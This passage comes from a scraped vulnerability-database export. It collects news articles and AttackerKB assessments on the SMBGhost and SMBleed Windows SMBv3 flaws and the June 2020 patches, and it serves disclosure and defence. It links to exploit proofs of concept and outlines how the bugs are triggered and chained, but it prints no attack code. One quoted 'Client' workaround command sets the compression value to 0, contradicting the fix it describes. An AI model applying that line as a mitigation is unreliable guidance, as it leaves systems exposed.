\n \nCompression headers are a feature that was added to the affected protocol of Windows 10 and Windows Server operating systems in May 2019, designed to compress the size of messages exchanged between a server and clients connected to it. \n \n\n\n \n\"To exploit the vulnerability against a server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server. To exploit the vulnerability against a client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it,\" Microsoft said in the [advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>). \n \nAt the time of writing, there is only one known [PoC exploit](<https://twitter.com/kryptoslogic/status/1238057276738592768>) that exists for this critical remotely exploitable flaw, but reverse engineering new patches could now also help hackers find possible attack vectors to develop fully weaponized self-propagating malware. \n \nA separate team of researchers has also published a [detailed technical analysis](<https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.html>) of the vulnerability, concluding a kernel pool overflow as the root cause of the issue. \n \nAs of today, there are nearly [48,000 Windows systems](<https://twitter.com/kryptoslogic/status/1238069159919063050>) vulnerable to the latest SMB compression vulnerability and accessible over the Internet. \n \nSince a patch for the wormable SMBv3 flaw is now available to download for affected versions of Windows, it's highly recommended for home users and businesses to install updates as soon as possible, rather than merely relying on the mitigation. \n \nIn cases where an immediate patch update is not applicable, it's advised to at least disable the SMB compression feature and block the SMB port for both inbound and outbound connections to help prevent remote exploitation. \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T14:30:00", "type": "thn", "title": "Critical Patch Released for 'Wormable' SMBv3 Vulnerability \u2014 Install It ASAP!", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-12T19:09:39", "id": "THN:90048C5D2E69F2E769EE053B3E1555AA", "href": "https://thehackernews.com/2020/03/patch-wormable-smb-vulnerability.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:38:34", "description": "[](<https://thehackernews.com/images/-XWqJWgCIL68/XmjWkC736wI/AAAAAAAAAEk/kCxnmKI_8FwVk2x8eaIUoMZR9IrJ6zuLACLcBGAsYHQ/s728-e100/windows-smbv3-wormable-vulnerability.jpg>)\n\nShortly after releasing its [monthly batch of security updates](<https://thehackernews.com/2020/03/microsoft-patch-tuesday-march-2020.html>), Microsoft late yesterday separately issued an 
[advisory](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005>) warning billions of its Windows users of a new critical, unpatched, and wormable vulnerability affecting **Server Message Block 3.0** (**SMBv3**) network communication protocol. \n \nIt appears Microsoft originally planned to fix the flaw as part of its March 2020 Patch Tuesday update only, but, for some reason, it pulled the plug at the last minute, which apparently did not stop a tech company from accidentally leaking the existence of the unpatched flaw. \n \nThe yet-to-be patched flaw (tracked as** CVE-2020-0796**), if exploited successfully, could allow an attacker to [execute arbitrary code](<https://kb.cert.org/vuls/id/872016/>) on the target SMB Server or SMB Client. \n \nThe belated acknowledgment from Microsoft led some researchers to call the bug \"[SMBGhost](<https://twitter.com/malwrhunterteam/status/1237480108568477697>).\" \n \n\"To exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server,\" Microsoft disclosed in an advisory. \"To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\" \n \nServer Message Block protocol provides the basis for file sharing, network browsing, printing services, and interprocess communication over a network. \n \n\n\n[](<https://thehackernews.com/images/-UcalHqQSaG0/XmjSmLBS_-I/AAAAAAAAAEY/S1FgtNQsCasVW03_xelhob0EUutLV6c1QCLcBGAsYHQ/s728-e100/cisco-smb-flaw.jpg>)\n\n \nAccording to a now-removed Cisco Talos post, the flaw opens vulnerable systems to a \"wormable\" attack, making it easy to propagate from one victim to the other. \n \nAlthough it's unclear when Microsoft plans to patch the flaw, the company is urging users to disable SMBv3 compression and block TCP port 445 on firewalls and client computers as a workaround. 
\n \nSet-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" DisableCompression -Type DWORD -Value 1 -Force \n \nFurthermore, Microsoft has cautioned that disabling SMBv3 compression will not prevent the exploitation of SMB clients. \n \nIt's worth pointing out that the flaw impacts only Windows 10 version 1903, Windows 10 version 1909, Windows Server version 1903, and Windows Server version 1909. But it's possible more versions are affected as SMB 3.0 was introduced with Windows 8 and Windows Server 2012. \n \nDespite the severity of the SMB bug, there's no evidence that it's being exploited in the wild. But it's also necessary to draw attention to the fact that this is far from the only time SMB has been exploited as an attack vector for intrusion attempts. \n \nIn the past few years alone, some of the major ransomware infections, including [WannaCry](<https://thehackernews.com/2017/05/how-to-wannacry-ransomware.html>) and [NotPetya](<https://thehackernews.com/2017/06/petya-ransomware-attack.html>), have been the consequence of SMB-based exploits. 
\n \nFor now, until Microsoft releases a security update designed to patch the CVE-2020-0796 RCE flaw, it's recommended that the system administrators implement the workarounds to block attacks attempting to exploit the vulnerability.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-11T12:16:00", "type": "thn", "title": "Warning \u2014 Unpatched Critical 'Wormable' Windows SMBv3 Flaw Disclosed", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-11T12:27:42", "id": "THN:F1DFBF3E8E6E5F3CD1282E08B3C3E35D", "href": "https://thehackernews.com/2020/03/smbv3-wormable-vulnerability.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:18", "description": "[](<https://thehackernews.com/images/-31RfzSS3xQM/Xt-9Ggf-iMI/AAAAAAAAAbo/CAzBcgrMaUkcozaX_3-vN2Kqw-vCruNKwCLcBGAsYHQ/s728-e100/SMBleed-smb-vulnerability.jpg>)\n\nCybersecurity researchers today uncovered a new critical vulnerability affecting the Server Message Block (SMB) protocol that could allow attackers to leak kernel memory remotely, and when combined with a 
previously disclosed \"wormable\" bug, the flaw can be exploited to achieve remote code execution attacks. \n \nDubbed \"**SMBleed**\" ([CVE-2020-1206](<https://blog.zecops.com/vulnerabilities/smbleed-writeup-cve-2020-1206-chaining-smbleed-with-smbghost-for-a-rce/>)) by cybersecurity firm ZecOps, the flaw resides in SMB's decompression function \u2014 the same function as with [SMBGhost](<https://thehackernews.com/2020/03/smbv3-wormable-vulnerability.html>) or EternalDarkness bug ([CVE-2020-0796](<https://nvd.nist.gov/vuln/detail/CVE-2020-0796>)), which came to light three months ago, potentially opening vulnerable Windows systems to malware attacks that can propagate across networks. \n \nThe newly discovered vulnerability impacts Windows 10 versions 1903 and 1909, for which Microsoft today released security patches as part of its monthly [Patch Tuesday updates for June](<https://thehackernews.com/2020/06/windows-update-june.html>). \n \nThe development comes as the US Cybersecurity and Infrastructure Security Agency (CISA) issued an advisory last week warning Windows 10 users to update their machines after exploit code for SMBGhost bug was published online last week. \n \nSMBGhost was deemed so serious that it received a maximum severity rating score of 10. \n \n\n\n[](<https://thehackernews.com/images/-HXrk2t3JHZo/Xt_WMvC_GjI/AAAAAAAA24g/XI7OAmusTswUO4fRatFn1viazIJt1A3YQCLcBGAsYHQ/s728-e100/SMBleed-smb-vulnerability.gif>)\n\n \n\"Although Microsoft disclosed and provided [updates for this vulnerability](<https://thehackernews.com/2020/03/patch-wormable-smb-vulnerability.html>) in March 2020, malicious cyber actors are targeting unpatched systems with the [new PoC](<https://github.com/chompie1337/SMBGhost_RCE_PoC/blob/master/README.md>), according to recent open-source reports,\" [CISA said](<https://www.us-cert.gov/ncas/current-activity/2020/06/05/unpatched-microsoft-systems-vulnerable-cve-2020-0796>). 
\n \nSMB, which runs over TCP port 445, is a network protocol that provides the basis for file sharing, network browsing, printing services, and interprocess communication over a network. \n \nAccording to ZecOps researchers, the flaw stems from the way the decompression function in question (\"[Srv2DecompressData](<https://blog.zecops.com/vulnerabilities/exploiting-smbghost-cve-2020-0796-for-a-local-privilege-escalation-writeup-and-poc/>)\") handles specially crafted message requests (e.g., [SMB2 WRITE](<https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-smb2/e7046961-3318-4350-be2a-a8d69bb59ce8>)) sent to a targeted SMBv3 Server, allowing an attacker to read uninitialized kernel memory and make modifications to the compression function. \n \n\"The message structure contains fields such as the amount of bytes to write and flags, followed by a variable-length buffer,\" the researchers said. \"That's perfect for exploiting the bug since we can craft a message such that we specify the header, but the variable-length buffer contains uninitialized data.\" \n \n\"An attacker who successfully exploited the vulnerability could obtain information to further compromise the user's system. To exploit the vulnerability against a server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 server,\" Microsoft said in its advisory. \n \n\"To exploit the vulnerability against a client, an unauthenticated attacker would need to configure a malicious SMBv3 server and convince a user to connect to it,\" Microsoft added. \n \n\n\n[](<https://thehackernews.com/images/-5r2cFQ5tcxU/Xt-7b9jI5lI/AAAAAAAAAbc/Lz27jkr0HmYimZJMXmSbvSt2mUc4GI6qQCLcBGAsYHQ/s728-e100/smbleed.jpg>)\n\n \nWorse, SMBleed can be chained with SMBGhost on unpatched Windows 10 systems to achieve remote code execution. 
The firm has also released a proof-of-concept [exploit code demonstrating](<https://github.com/ZecOps/CVE-2020-1206-POC>) the [flaws](<https://github.com/ZecOps/CVE-2020-0796-RCE-POC>). \n \n\n\n[](<https://thehackernews.com/images/-Jn6fEt5YpZ0/Xt_6MEANjOI/AAAAAAAA24s/zLjx-XBqNLYnjfayGiHXEKJko4si4eOqQCLcBGAsYHQ/s728-e100/windows-security.jpg>)\n\n \nTo mitigate the vulnerability, it's recommended that home and business users install the latest Windows updates as soon as possible. \n \nFor systems where the patch is not applicable, it's advised to block port 445 to prevent lateral movement and remote exploitation. \n \nMicrosoft's security guidance addressing SMBleed and SMBGhost in Windows 10 version 1909 and 1903 and Server Core for the same versions can be [found here](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1206>) and [here](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-06-09T20:30:00", "type": "thn", "title": "SMBleed: A New Critical Vulnerability Affects Windows SMB Protocol", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1206"], "modified": "2020-06-10T03:44:11", "id": "THN:17F11846886656062FA1EA84D1C74534", "href": "https://thehackernews.com/2020/06/SMBleed-smb-vulnerability.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:40:18", "description": "[](<https://thehackernews.com/images/-HLpQHeEvk6w/Xt_Q3_Z2PhI/AAAAAAAA24Y/ALzIuhTPzrEdlhe18apQb6AzpVQcp9qjQCLcBGAsYHQ/s728-e100/windows-update.jpg>)\n\nMicrosoft today released its June 2020 batch of software security updates that patches a total of 129 newly discovered vulnerabilities affecting various versions of Windows operating systems and related products. \n \nThis is the third Patch Tuesday update since the beginning of the global Covid-19 outbreak, putting some extra pressure on security teams struggling to keep up with patch management while proceeding with caution that should not break anything during this lockdown season. \n \nThe 129 bugs in the June 2020 bucket for sysadmins and billions of users include 11 critical vulnerabilities\u2014all leading to remote code execution attacks\u2014and 118 classified as important in severity, mostly leading to privilege escalation and spoofing attacks. \n \nAccording to the advisories Microsoft released today, hackers, fortunately, don't appear to be exploiting any of the zero-day vulnerabilities in the wild, and details for none of the flaws addressed this month was disclosed publicly before this publication. 
\n \nOne of the notable flaws is an information disclosure vulnerability ([CVE-2020-1206](<https://thehackernews.com/2020/06/SMBleed-smb-vulnerability.html>)) in the Server Message Block 3.1.1 (SMBv3) protocol that, according to a team of researchers, can be exploited in combination with the previously disclosed [SMBGhost (CVE-2020-0796)](<https://thehackernews.com/2020/03/smbv3-wormable-vulnerability.html>) flaw to achieve remote code execution. More [details on this flaw](<https://thehackernews.com/2020/06/SMBleed-smb-vulnerability.html>) are available here. \n \nThree critical bugs (CVE-2020-1213, [CVE-2020-1216](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1216>) and CVE-2020-1260) affect the VBScript engine and exist in the way it handles objects in memory, allowing an attacker to execute arbitrary code in the context of the current user. \n \nMicrosoft has listed these flaws as \"Exploitation more likely,\" explaining that it has consistently seen attackers exploit similar flaws in the past, and that they can be triggered remotely through a browser, an application or a Microsoft Office document that hosts the IE rendering engine. \n \nAnother of the 11 critical issues is a vulnerability ([CVE-2020-1299](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1299>)) in the way Windows handles shortcut (.LNK) files, allowing attackers to execute arbitrary code on targeted systems remotely. As with previous LNK vulnerabilities, a successful attack can cost victims control of their computers or expose their sensitive data. \n \nThe GDI+ component, which lets programs render graphics and formatted text on a display or printer in Windows, has also been found vulnerable to a remote code execution flaw (CVE-2020-1248). 
\n \nAccording to Microsoft, the GDI+ RCE vulnerability can be exploited in combination with a separate critical security feature bypass vulnerability ([CVE-2020-1229](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1229>)) in Microsoft Outlook that lets attackers make the client automatically load malicious images hosted on a remote server. \n \n\"In an email attack scenario, an attacker could exploit the vulnerability by sending the specially crafted image to the user. An attacker who successfully exploited this vulnerability could cause a system to load remote images. These images could disclose the IP address of the targeted system to the attacker,\" the advisory says. \n \nBesides these, the June 2020 update also includes a patch for a new critical remote code execution flaw ([CVE-2020-9633](<https://helpx.adobe.com/security/products/flash-player/apsb20-30.html>)) affecting Adobe Flash Player on Windows systems. \n \nAll users should apply the latest security patches as soon as possible to prevent malware or attackers from exploiting these flaws to gain remote control over vulnerable computers. \n \nTo install the latest security updates, Windows users can go to Start > Settings > Update & Security > Windows Update and select Check for updates.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-06-09T18:14:00", "type": "thn", "title": "Microsoft Releases June 2020 Security Patches For 129 Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1206", "CVE-2020-1213", "CVE-2020-1216", "CVE-2020-1229", "CVE-2020-1248", "CVE-2020-1260", "CVE-2020-1299", "CVE-2020-9633"], "modified": "2020-06-10T17:48:33", "id": "THN:882595A940E5AB15E8B9C472154ACA45", "href": "https://thehackernews.com/2020/06/windows-update-june.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2022-03-29T18:03:54", "description": "This indicates an attack attempt to exploit a Buffer Overflow Vulnerability in Microsoft SMB Servers. \nThe vulnerability is due to an error when the vulnerable software handles a maliciously crafted compressed data packet. 
A remote, unauthenticated attacker can exploit this to execute arbitrary code within the context of the application.\n\n \n**Recent assessments:** \n \n**jorgeorchilles** at March 11, 2020 1:19pm UTC reported:\n\n# Summary\n\nSMBv3.11 has a buffer overflow vulnerability when compression is enabled (default value). Windows 10 and Server use SMBv3.11 and the service runs as SYSTEM. **Successful exploitation will result in remote code execution, with SYSTEM privileges. This is considered \u201cwormable\u201d.** Microsoft did not release a patch in March 2020 Patch Tuesday. **Update 3/12/2020: Microsoft released an out of band patch**\n\n# Narrative\n\nMicrosoft pulled the patch for CVE-2020-0796 from March 2020 Patch Tuesday at the last minute and some information was leaked by Cisco Talos but then deleted from their post. A screenshot I took states: \u201cCVE-2020-0796 is a remote code execution vulnerability in Microsoft Server Message Block 3.0 (SMBv3). An attacker could exploit this bug by sending a specially crafted packet to the target SMBv3 server, which the victim needs to be connected to.\u201d\n\nMicrosoft then released an advisory with more information: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV200005> \n\u201cMicrosoft is aware of a remote code execution vulnerability in the way that the Microsoft Server Message Block 3.1.1 (SMBv3) protocol handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target SMB Server or SMB Client. To exploit the vulnerability against an SMB Server, an unauthenticated attacker could send a specially crafted packet to a targeted SMBv3 Server. 
To exploit the vulnerability against an SMB Client, an unauthenticated attacker would need to configure a malicious SMBv3 Server and convince a user to connect to it.\u201d\n\nCERT followed: <https://www.kb.cert.org/vuls/id/872016/>\n\n# Impact\n\nThis issue affects both SMB clients and servers that have SMBv3 compression enabled. Remote code execution is possible pre-authentication from the network. CVSSv3 of 10. SMB runs with SYSTEM privileges.\n\n# Affected Population\n\nImpacted systems must run SMB v3.11. Compression is enabled by default. \nWindows 10 Version 1903 for 32-bit Systems \nWindows 10 Version 1903 for ARM64-based Systems \nWindows 10 Version 1903 for x64-based Systems \nWindows 10 Version 1909 for 32-bit Systems \nWindows 10 Version 1909 for ARM64-based Systems \nWindows 10 Version 1909 for x64-based Systems \nWindows Server, version 1903 (Server Core installation) \nWindows Server, version 1909 (Server Core installation)\n\n# Identify Vulnerable Hosts\n\nA method to identify whether SMB v3.11 is running, and therefore vulnerable given no patch, is possible through nmap: <https://gist.github.com/nikallass/40f3215e6294e94cde78ca60dbe07394>\n\n# Workaround\n\nDisable SMBv3 compression via registry as specified in ADV200005. \nServer: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 1 -Force \nClient: Set-ItemProperty -Path \u201cHKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\u201d DisableCompression -Type DWORD -Value 0 -Force\n\n# Update 3/12/2020\n\nMicrosoft released an out of band patch: <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796>\n\n**zeroSteiner** at April 15, 2020 4:10pm UTC, **FULLSHADE** at April 21, 2020 3:50am UTC, **brettsec** at March 10, 2020 9:16pm UTC and **busterb** at March 15, 2020 12:19pm UTC reported the same assessment.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4 \nAssessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-03-12T00:00:00", "type": "attackerkb", "title": "CVE-2020-0796 - SMBGhost", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796"], "modified": "2020-09-02T00:00:00", "id": "AKB:E85583CB-111D-4D95-80E5-4CD53BB1F952", "href": "https://attackerkb.com/topics/2LCXe3EPAZ/cve-2020-0796---smbghost", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-12-24T20:08:00", "description": "An information disclosure vulnerability exists in the way that the Microsoft Server 
Message Block 3.1.1 (SMBv3) protocol handles certain requests, aka \u2018Windows SMBv3 Client/Server Information Disclosure Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**busterb** at June 09, 2020 11:49pm UTC reported:\n\nEdit: After writing this **@adfoster-r7** pointed out that Zecops has a writeup on exactly how to chain this with SMBGhost. How apropos! <https://blog.zecops.com/vulnerabilities/smbleedingghost-writeup-chaining-smbleed-cve-2020-1206-with-smbghost/>\n\nNote that if you were already patched against CVE-2020-0796, the current PoCs aren\u2019t going to be impactful to you, so the urgency is lower than if you\u2019re a couple of months out of date. If you\u2019re patching already, no need to panic.\n\nWhenever we see SMB memory corruption leaks, the cry is always \u2018oh, if only we had an information leak, we could make this so much more reliable\u2019. Well, assuming someone figures out the details, this could be the information leak folks are looking for to make SMBGhost and other vulnerabilities more reliable to exploit. Not a big deal by itself, but I imagine folks are already trying to figure out how to use this to an advantage. 
It might not take long given the existence of public SMBGhost PoCs already.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4 \nAssessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-06-09T00:00:00", "type": "attackerkb", "title": "CVE-2020-1206 Windows SMBv3 Client/Server Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2020-1206"], "modified": "2020-07-24T00:00:00", "id": "AKB:ED05CA72-27C8-4C22-BFF9-2AE3451C549C", "href": "https://attackerkb.com/topics/svIblFzC4r/cve-2020-1206-windows-smbv3-client-server-information-disclosure-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-06T08:00:24", "description": "HTTP Protocol Stack Remote Code Execution Vulnerability\n\n \n**Recent assessments:** \n \n**architect00** at May 12, 2021 8:18am UTC reported:\n\nThe vulnerability only affects newer versions of Windows 10 / Server. 
Version 20H2 and 2004 of Windows 10 and Windows Server Core installations are affected according to the Microsoft Advisory.\n\nThe semi-annual channel versions are not that common in bigger organisations. This affected my rating on _attacker value_. I would argue that most of them use the LTSC of older Windows versions. The _attacker value_ is not very low, because the vulnerability has the potential of being used for lateral movement in a computer worm. So this might still be relevant to use in smaller organisations.\n\nMicrosoft rates this vulnerability \u201cExploitation more likely\u201d. This means that exploitation would be reliable and Microsoft is aware of exploits in the past for similar vulnerabilities. This affected my _Exploitability_ scoring towards _Easy_ on this vulnerability.\n\nSources:\n\n<https://twitter.com/GossiTheDog/status/1392211087601410054> \n<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31166>\n\n**jheysel-r7** at May 17, 2021 7:38pm UTC and **nu11secur1ty** at July 10, 2021 9:26pm UTC reported the same assessment.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-05-11T00:00:00", "type": "attackerkb", "title": "CVE-2021-31166", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0796", "CVE-2021-31166"], "modified": "2021-05-23T00:00:00", "id": "AKB:72CB57AD-D32C-43D3-86B8-F8B617707C5B", "href": "https://attackerkb.com/topics/pZcouFxeCW/cve-2021-31166", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-20T20:15:40", "description": "An elevation of privilege vulnerability exists in OpenSSH for Windows when it does not properly restrict access to configuration settings, aka \u2018OpenSSH for Windows Elevation of Privilege Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**busterb** at June 09, 2020 7:11pm UTC reported:\n\nThis vuln. 
